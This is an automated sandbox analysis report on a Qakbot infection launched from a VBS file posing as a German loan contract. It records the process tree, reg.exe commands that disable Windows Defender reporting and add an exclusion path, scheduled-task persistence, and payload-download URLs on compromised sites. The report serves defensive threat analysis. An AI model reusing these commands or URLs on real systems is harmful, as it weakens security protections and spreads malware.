Resubmissions

19/05/2020, 13:04 UTC

200519-7d9ja2krwe 10

19/05/2020, 12:28 UTC

200519-4h8rvftfme 8

Analysis

  • max time kernel
    255s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    19/05/2020, 13:04 UTC

General

  • Target

    Darlehensvertrag_42816504192_15052020.vbs

  • Size

    36.2MB

  • MD5

    e44fb6c9a050ae7ef4b55cce6a71cdcd

  • SHA1

    dd77b217e503fddaf28bb60b6e3280a692807976

  • SHA256

    c888b058cd85352ec803eb2a6e78bef567b844e9982176efbcd7074982a760de

  • SHA512

    9524cdd296cb89eb1cc8a160a62337a908990aa1e6d84b0e51c1827bec705331f458c0713d64cfe221a55ad32331db74a8e9ff4a356d6b2fb515b464e3804ab5

Malware Config

Extracted

Family

qakbot

Botnet

spx121

Campaign

1589802571

C2


Signatures

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Windows security modification 2 TTPs 6 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Executes dropped EXE 7 IoCs
  • Suspicious use of WriteProcessMemory 81 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Loads dropped DLL 4 IoCs
  • Turns off Windows Defender SpyNet reporting 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Blacklisted process makes network request 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Darlehensvertrag_42816504192_15052020.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Blacklisted process makes network request
    PID:1068
    • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Loads dropped DLL
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
        C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe /C
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:1608
      • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        3⤵
        • Suspicious behavior: MapViewOfSection
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:1572
        • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe /C
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1964
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1956
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn vibhuwyoc /tr "\"C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe\" /I vibhuwyoc" /SC ONCE /Z /ST 15:09 /ET 15:21
        3⤵
        • Creates scheduled task(s)
        PID:1936
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {993A98C4-DF39-4597-990B-D65ECEADDFDC} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe /I vibhuwyoc
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Loads dropped DLL
      • Modifies data under HKEY_USERS
      PID:1028
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:1692
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:516
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        PID:1448
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        3⤵
        PID:1512
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:1020
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:2008
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:1764
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:1180
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue" /d "0"
        3⤵
        • Windows security bypass
        PID:1456
      • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:484
        • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe /C
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:952
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe"
        3⤵
        PID:1824
        • C:\Windows\system32\PING.EXE
          ping.exe -n 6 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:864
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /DELETE /F /TN vibhuwyoc
        3⤵
        PID:1760

Network

          • flag-unknown
            DNS
            same-way.com
            Remote address:
            8.8.8.8:53
            Request
            same-way.com
            IN A
            Response
            same-way.com
            IN A
            46.250.210.61
          • flag-unknown
            GET
            http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            46.250.210.61:80
            Request
            GET /new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: same-way.com
            Response
            HTTP/1.1 404 Not Found
            Date: Tue, 19 May 2020 13:05:36 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://same-way.com/wp-json/>; rel="https://api.w.org/"
            Set-Cookie: cookielawinfo-checkbox-necessary=yes; expires=Tue, 19-May-2020 14:05:36 GMT; Max-Age=3600; path=/
            Set-Cookie: cookielawinfo-checkbox-non-necessary=yes; expires=Tue, 19-May-2020 14:05:36 GMT; Max-Age=3600; path=/
            Upgrade: h2,h2c
            Connection: Upgrade, Keep-Alive
            Strict-Transport-Security: max-age=15768000
            Keep-Alive: timeout=5, max=100
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
          • flag-unknown
            DNS
            fifa.legavirtuale.com
            Remote address:
            8.8.8.8:53
            Request
            fifa.legavirtuale.com
            IN A
            Response
            fifa.legavirtuale.com
            IN A
            149.202.157.236
          • flag-unknown
            GET
            http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.202.157.236:80
            Request
            GET /campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: fifa.legavirtuale.com
          • flag-unknown
            DNS
            kavin.chenabfoods.co.uk
            Remote address:
            8.8.8.8:53
            Request
            kavin.chenabfoods.co.uk
            IN A
            Response
            kavin.chenabfoods.co.uk
            IN A
            149.255.59.15
          • flag-unknown
            GET
            http://kavin.chenabfoods.co.uk/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.255.59.15:80
            Request
            GET /wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: kavin.chenabfoods.co.uk
            Response
            HTTP/1.1 302 Found
            Date: Tue, 19 May 2020 13:06:06 GMT
            Server: Apache
            Location: http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            Content-Length: 333
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
          • flag-unknown
            GET
            http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.255.59.15:80
            Request
            GET /cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: kavin.chenabfoods.co.uk
            Response
            HTTP/1.1 200 OK
            Date: Tue, 19 May 2020 13:06:06 GMT
            Server: Apache
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Transfer-Encoding: chunked
            Content-Type: text/html
          • flag-unknown
            DNS
            beelif.com
            Remote address:
            8.8.8.8:53
            Request
            beelif.com
            IN A
            Response
            beelif.com
            IN A
            103.124.93.136
          • flag-unknown
            GET
            http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            103.124.93.136:80
            Request
            GET /wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: beelif.com
            Response
            HTTP/1.1 200 OK
            Server: nginx/1.17.10
            Date: Tue, 19 May 2020 13:06:15 GMT
            Content-Type: image/png
            Content-Length: 704000
            Connection: keep-alive
            X-Powered-By: PHP/5.4.16
            Accept-Ranges: bytes
            Expires: 0
            Cache-Control: no-cache, no-store, must-revalidate
            Content-Disposition: attachment; filename="333333.png"
          • 46.250.210.61:80
            http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            1.5kB
            51.7kB
            25
            39

            HTTP Request

            GET http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            404
          • 149.202.157.236:80
            http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            462 B
            92 B
            4
            2

            HTTP Request

            GET http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
          • 149.255.59.15:80
            http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            1.1kB
            9.1kB
            10
            14

            HTTP Request

            GET http://kavin.chenabfoods.co.uk/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            302

            HTTP Request

            GET http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            200
          • 103.124.93.136:80
            http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            12.0kB
            723.9kB
            254
            489

            HTTP Request

            GET http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            200
          • 8.8.8.8:53
            same-way.com
            dns
            58 B
            74 B
            1
            1

            DNS Request

            same-way.com

            DNS Response

            46.250.210.61

          • 8.8.8.8:53
            fifa.legavirtuale.com
            dns
            67 B
            83 B
            1
            1

            DNS Request

            fifa.legavirtuale.com

            DNS Response

            149.202.157.236

          • 239.255.255.250:1900
            966 B
            6
          • 8.8.8.8:53
            kavin.chenabfoods.co.uk
            dns
            69 B
            85 B
            1
            1

            DNS Request

            kavin.chenabfoods.co.uk

            DNS Response

            149.255.59.15

          • 8.8.8.8:53
            beelif.com
            dns
            56 B
            72 B
            1
            1

            DNS Request

            beelif.com

            DNS Response

            103.124.93.136

          • 239.255.255.250:1900

MITRE ATT&CK Enterprise v6


Downloads

  • memory/952-18-0x00000000022E0000-0x00000000022F1000-memory.dmp
    Filesize
    68KB
  • memory/1068-1-0x0000000002FB0000-0x0000000002FB4000-memory.dmp
    Filesize
    16KB
  • memory/1572-12-0x00000000002F0000-0x000000000032A000-memory.dmp
    Filesize
    232KB
  • memory/1608-5-0x0000000002350000-0x0000000002361000-memory.dmp
    Filesize
    68KB
  • memory/1964-11-0x0000000002320000-0x0000000002331000-memory.dmp
    Filesize
    68KB
